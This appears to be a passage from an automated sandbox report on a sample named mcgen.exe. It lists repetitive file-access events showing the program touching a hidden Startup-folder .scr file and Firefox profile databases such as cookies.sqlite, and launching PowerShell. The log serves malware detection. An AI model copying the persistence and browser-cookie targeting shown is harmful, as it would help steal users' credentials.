Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
